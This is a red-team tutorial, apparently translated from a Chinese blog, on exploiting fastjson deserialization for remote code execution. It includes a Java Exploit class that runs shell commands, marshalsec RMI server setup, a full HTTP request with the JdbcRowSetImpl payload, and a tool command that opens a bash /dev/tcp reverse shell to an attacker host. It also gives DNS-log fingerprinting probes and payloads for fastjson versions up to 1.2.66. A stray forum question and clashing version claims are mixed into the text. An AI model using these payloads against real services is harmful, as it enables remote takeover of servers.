Red team arsenal: fastjson < 1.2.68 full-version RCE exploit reproduction

0x01 Vulnerability Introduction

Fastjson is a JSON parser open-sourced by Alibaba. It performs well and is widely used in the Java projects of major vendors. Fastjson added a deserialization whitelist after version 1.2.24, but in versions before 1.2.48 an attacker can use a specially constructed JSON string to bypass the whitelist check and execute arbitrary commands.

0x02 Affected versions

Fastjson < 1.2.68

The published bypass technique affects all versions below 1.2.68.

0x03 Vulnerability reproduction

Fastjson 1.2.47 is used as the example here, because vulhub conveniently provides a ready-made environment for it.

P牛, I used the 1.2.47 docker from vulhub and wanted to test the dnslog check for fastjson, but I never receive the dnslog, while the normal exp reverse shell works. I am confused.
Is my usage correct? I used this: {"@type":"java.net.Inet4Address","val":"bouaiq.dnslog.cn"}

Schematic diagram of the process (figure not reproduced here):

Host A: Host with fastjson deserialization vulnerability
Host C: Serving RMI/LDAP
Host B: Constructed malicious class (including commands to be executed)

The remote command execution process as a whole:

1. The attacker sends the payload to host A (the payload must specify the RMI/LDAP address).

2. Host A triggers the deserialization vulnerability and makes an RMI remote call to host C.

3. The RMI service on host C points to the malicious Java class hosted on host B, so host A ultimately loads and executes host B's malicious Java class via host C's RMI service.

4. Host A executes the malicious system command.

0x04 Reproduction steps

Reproduce according to the above process and environment:

Host A: http://1.1.1.1:8090 (host with Fastjson vulnerability)
Host B: http://2.2.2.2:8888 (malicious java service)
Host C: rmi://2.2.2.2:9999 (remote method call service)

(In practice hosts B and C are one machine with different ports.)

0x041 Construct the malicious class

The target environment is openjdk:8u102. This version does not restrict com.sun.jndi.rmi.object.trustURLCodebase, so RMI can be used directly for command execution.

First, compile and upload the command execution code. Use the following class as the payload; touch /zydx666 is the system command and can be changed as needed.

Note that the file name must be Exploit.java; this fixed format cannot be changed.

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit {

    // The constructor runs when the JNDI client instantiates the remotely loaded class
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "touch /zydx666"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while ((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

On host B, compile Exploit.java with javac to produce Exploit.class:

javac Exploit.java

Then start an HTTP service on host B. Any web server will do, as long as Exploit.class is reachable over HTTP; here python3 is used to start a temporary one:

python3 -m http.server --bind 0.0.0.0 8888

0x042 Start the RMI service

Next, start the RMI service on host C:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://1.1.1.1:8888/#Exploit" 9999

marshalsec-0.0.3-SNAPSHOT-all.jar comes from https://github.com/mbechler/marshalsec

All services are now ready.

0x043 Send the payload

Next, send the fastjson deserialization payload to host A (the vulnerable machine):

POST / HTTP/1.1
Host: 1.1.1.1:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 260

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://2.2.2.2:9999/Exploit",
        "autoCommit":true
    }
}

Host A receives the POST request, triggers the deserialization vulnerability, and finally executes the code in Exploit.class.


I am using the reverse shell command

The reverse shell succeeds:


0x05 Simplified attack tool

A simplified version of the tooling is shown below.

It was written by the author of https://github.com/wyzxxz/fastjson_rce_tool: a single jar that starts the RMI service and generates the malicious class file in one step.

Step 1: start it on your own server:

java -cp fastjson_tool.jar fastjson.HRMIServer 1.1.1.1 8888 "bash=bash -i >&/dev/tcp/x.x.x.x/80 0>&1" 

Step 2: send the payload.

The reverse shell is obtained:


0x06 Vulnerability detection

Determining whether an unknown target uses Fastjson when the site echoes raw error messages:

If the site echoes raw error messages, send an unclosed curly brace to provoke an error; the error output will often contain the string fastjson.


Without error echo, Fastjson can be distinguished from Jackson blindly via a DNS callback.

The following payload is used for the test:

{"zeo":{"@type":"java.net.Inet4Address","val":"745shj.dnslog.cn"}}


The DNS query arrives at dnslog:


Even the latest version, 1.2.67, can still be fingerprinted as fastjson via dnslog:

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

Malformed variant:

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

POC (nested inside an outer key such as zeo):

{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:0

0x07 Multi-version payload collection

Affected version:

fastjson<=1.2.24

exp:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}

Affected version:

fastjson<=1.2.41

Prerequisite:
autoTypeSupport must be set to true (fastjson >= 1.2.25 defaults to false).

exp:

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}

Affected version:

fastjson<=1.2.42

Prerequisite:
autoTypeSupport must be set to true (fastjson >= 1.2.25 defaults to false).

exp:

{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

Affected version:

fastjson<=1.2.43

Prerequisite:
autoTypeSupport must be set to true (fastjson >= 1.2.25 defaults to false).

exp:

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

Affected version:

fastjson<=1.2.45

Prerequisite:
autoTypeSupport must be set to true (fastjson >= 1.2.25 defaults to false).

exp:

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}

Affected version:

fastjson<=1.2.47

exp:

{
    "a": {
        "@type": "java.lang.Class", 
        "val": "com.sun.rowset.JdbcRowSetImpl"
    }, 
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "ldap://x.x.x.x:1999/Exploit", 
        "autoCommit": true
    }
}

Affected version:

fastjson<=1.2.62

exp:

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}"

Affected version:

fastjson<=1.2.66

Prerequisite:
autoTypeSupport must be set to true (fastjson >= 1.2.25 defaults to false).

exp:

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}


Source: blog.csdn.net/god_zzZ/article/details/107122487